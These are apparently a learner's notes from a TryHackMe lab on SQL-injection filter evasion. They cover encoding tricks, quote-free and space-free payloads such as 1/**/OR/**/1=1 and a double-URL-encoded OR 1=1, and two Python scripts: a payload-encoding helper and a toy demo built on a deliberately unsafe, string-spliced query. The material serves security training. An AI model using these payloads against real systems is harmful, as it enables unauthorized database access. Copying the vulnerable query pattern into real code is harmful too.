Filter Evasion
My notes from the Filter Evasion section in the Advanced SQLi room on TryHackMe.
Most web apps now sit behind input filters or a WAF that block the obvious SQL payloads, so a tester needs more subtle ways of expressing the same query. The common thread in every technique below is that the filter sees something that looks harmless while the database still parses it as the intended SQL.
Character Encoding
URL Encoding: Seen frequently in GET requests. Each character is replaced by % followed by the two hex digits of its byte value, e.g. ' becomes %27 and a space becomes %20. Encoding a character twice (%27 becomes %2527) is useful when the filter decodes the parameter once but the application decodes it again before building the query.
Hexadecimal Encoding: In MySQL a hex literal such as 0x61646d696e is treated as the string admin, so string values can be written without any quote characters.
Unicode Encoding: Characters are written as Unicode escape sequences, e.g. \u0027 (JSON/JavaScript style) or the legacy %u0027 form for a single quote. This only helps if some component between the filter and the database decodes the escape back into the literal character.
No Quote SQLi
The trick here is to use numbers or other values that don't need quotes. For example, where ' OR '1'='1 would be blocked, an unquoted numeric injection point (WHERE id = <input>) can be exploited with OR 1=1 and no quote at all.
Use CONCAT(): the function builds strings without quotes from hex literals. For example CONCAT(0x4b, 0x61, 0x76, 0x69, 0x6e) builds the string Kavin (one byte per literal: 0x4b is K, 0x61 is a, and so on). In MySQL the single literal 0x4b6176696e gives the same result, and CHAR(75,97,118,105,110) works too.
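Building the encoded and quote-free forms above, as an added example that is not from the room: the function names are my own, the helpers produce the URL-encoded, double-URL-encoded, Unicode-escaped, MySQL hex-literal, CONCAT(0x..) and CHAR(..) forms of a string, and decode_hex_expression turns a hex expression back into text so a payload can be checked before it is sent.

```python
"""Added example (not from the TryHackMe room): helpers that produce the
encoded / quote-free forms of a string described in the notes, plus a
reverse check. Function names are my own choice."""
import re
from urllib.parse import quote


def url_encode(text: str, rounds: int = 1) -> str:
    """Percent-encode every non-alphanumeric byte; rounds=2 gives the
    %25XX double-encoded form (the % itself becomes %25)."""
    out = text
    for _ in range(rounds):
        out = quote(out, safe="")
    return out


def unicode_escape(text: str, style: str = "json") -> str:
    """\\u0027 style (JSON / JavaScript) or the legacy %u0027 style."""
    fmt = "\\u{:04x}" if style == "json" else "%u{:04x}"
    return "".join(fmt.format(ord(c)) for c in text)


def mysql_hex_literal(text: str) -> str:
    """Single 0x... literal; MySQL reads it as the string itself, no quotes."""
    return "0x" + text.encode("utf-8").hex()


def mysql_concat_hex(text: str) -> str:
    """The CONCAT(0x4b, 0x61, ...) form from the notes, one literal per byte."""
    parts = ", ".join(f"0x{b:02x}" for b in text.encode("utf-8"))
    return f"CONCAT({parts})"


def sql_char_call(text: str) -> str:
    """CHAR(75,97,...) form: quote-free and valid in both MySQL and SQLite."""
    return "CHAR(" + ",".join(str(b) for b in text.encode("utf-8")) + ")"


def decode_hex_expression(expr: str) -> str:
    """Reverse check: join every 0x.. literal in expr and decode the bytes."""
    digits = "".join(re.findall(r"0x([0-9a-fA-F]+)", expr))
    return bytes.fromhex(digits).decode("utf-8")


if __name__ == "__main__":
    for fn in (url_encode, unicode_escape, mysql_hex_literal,
               mysql_concat_hex, sql_char_call):
        print(f"{fn.__name__:20s} {fn('Kavin')}")
    print("round trip:", decode_hex_expression(mysql_concat_hex("Kavin")))
```

The double-encoded form is only useful against a target that decodes twice; run url_encode with rounds=1 first and escalate to rounds=2 only when the single-encoded payload is blocked.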
No Spaces
Here spaces are replaced by the SQL comment /**/, which the parser treats as whitespace, to bypass filters that block the space character. For example:
SELECT * FROM users; gets converted to SELECT/**/*/**/FROM/**/users;
Tab or newline characters (\t or \n) can also be used instead of spaces, since many filters only look for the 0x20 byte.
In URL-encoded form these are %09 (tab), %0A (newline), %0C (form feed) and %0D (carriage return); %A0 (the Latin-1 non-breaking space) is also accepted as whitespace by MySQL.
For example, 1'%250A||%250A1=1-- - is the double-URL-encoded form of 1'%0A||%0A1=1-- - . It is used when the filter decodes the parameter once (and so sees the harmless text %0A) but the application decodes it a second time before building the query, at which point %0A becomes a newline. In MySQL || is OR, so the database ends up running 1' OR 1=1 followed by a comment; the trailing -- - is used because -- only starts a MySQL comment when followed by whitespace, and the extra character keeps that space from being trimmed.
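The no-quote and no-space tricks above, run end to end as an added example that is not part of the room: a toy web layer with a block-list filter in front of an in-memory SQLite database. The table, the two filter rules and the payloads are all constructed for this demo; SQLite stands in for MySQL, and because SQLite treats || as string concatenation rather than OR the payloads here spell out OR instead. The double-decoding app mode is what the %25XX payload in the notes relies on.

```python
"""Added example (not from the TryHackMe room): a toy web layer in front of an
in-memory SQLite database showing why the no-quote and no-space payloads get
past a character block-list while the database still runs them as intended.
Table contents, filter rules and payloads are all constructed for this demo."""
import re
import sqlite3
from urllib.parse import unquote

# Block-list regexes standing in for a WAF rule (constructed, not a real product).
SPACE_AND_QUOTE = re.compile(r"[' ]")    # blocks only the single quote and 0x20
ALL_WHITESPACE = re.compile(r"['\s]")    # also blocks \t \n \r \f (%09 %0A %0D %0C)


def make_db() -> sqlite3.Connection:
    """Constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, username TEXT);"
        "INSERT INTO users VALUES (1,'admin'),(2,'alice'),(3,'bob');"
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str):
    # Deliberately unsafe: the value is spliced straight into a numeric
    # comparison, so there are no surrounding quotes to break out of. This is
    # exactly the situation where a quote-free payload is enough.
    sql = f"SELECT id, username FROM users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def simulate(conn, raw_param: str, block_re, app_double_decodes: bool = False):
    """raw_param is the still-URL-encoded query-string value.

    The filter URL-decodes once and inspects the result. A normal app uses
    that same decoded value; an app that decodes a second time is the
    misconfiguration the %25XX double-encoding trick relies on.
    Returns (status, rows) with status one of blocked / executed / sql-error.
    """
    seen_by_filter = unquote(raw_param)
    if block_re.search(seen_by_filter):
        return ("blocked", [])
    seen_by_db = unquote(seen_by_filter) if app_double_decodes else seen_by_filter
    try:
        return ("executed", vulnerable_lookup(conn, seen_by_db))
    except sqlite3.Error as exc:
        return ("sql-error", [str(exc)])


def demo():
    """Each evasion from the notes against the two filters; returns a dict of
    label -> (status, rows) so the outcomes can be inspected or asserted."""
    conn = make_db()
    cases = [
        # a real space: caught even by the weakest filter
        ("space, weak filter", "1%20OR%201%3D1", SPACE_AND_QUOTE, False),
        # comment-as-space: no whitespace byte at all, beats the strict filter
        ("comment-as-space, strict filter", "1/**/OR/**/1=1", ALL_WHITESPACE, False),
        # tab + newline: beats a filter that only knows about 0x20 ...
        ("tab+newline, weak filter", "1%09OR%0A1=1", SPACE_AND_QUOTE, False),
        # ... but not one that blocks every \s character
        ("tab+newline, strict filter", "1%09OR%0A1=1", ALL_WHITESPACE, False),
        # double-encoded: the filter sees the text %09 / %0A, the app decodes again
        ("double-encoded, strict filter, app double-decodes",
         "1%2509OR%250A1=1", ALL_WHITESPACE, True),
        # no quotes: CHAR(97,100,109,105,110) is 'admin' (SQLite analogue of CONCAT(0x..))
        ("no quotes via CHAR(), strict filter",
         "0/**/OR/**/username=char(97,100,109,105,110)", ALL_WHITESPACE, False),
        # the same comparison written with quotes is blocked
        ("quoted string, strict filter",
         "0/**/OR/**/username=%27admin%27", ALL_WHITESPACE, False),
    ]
    return {label: simulate(conn, raw, block_re, dbl)
            for label, raw, block_re, dbl in cases}


if __name__ == "__main__":
    for label, (status, rows) in demo().items():
        print(f"{label:50s} {status:9s} {rows}")
```

Note that the double-encoded payload only reaches the database intact when the application decodes twice; against a normally behaving app the literal %09 and %0A land in the query and produce a SQL error instead, which is a useful tell when testing.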
Important!

No single technique guarantees a bypass of a given filter or layer of protection. The key is to know several approaches and keep trying until one works; in practice they are combined, for example comment-as-space together with hex strings and encoding. The above are a few miscellaneous ways to evade filters.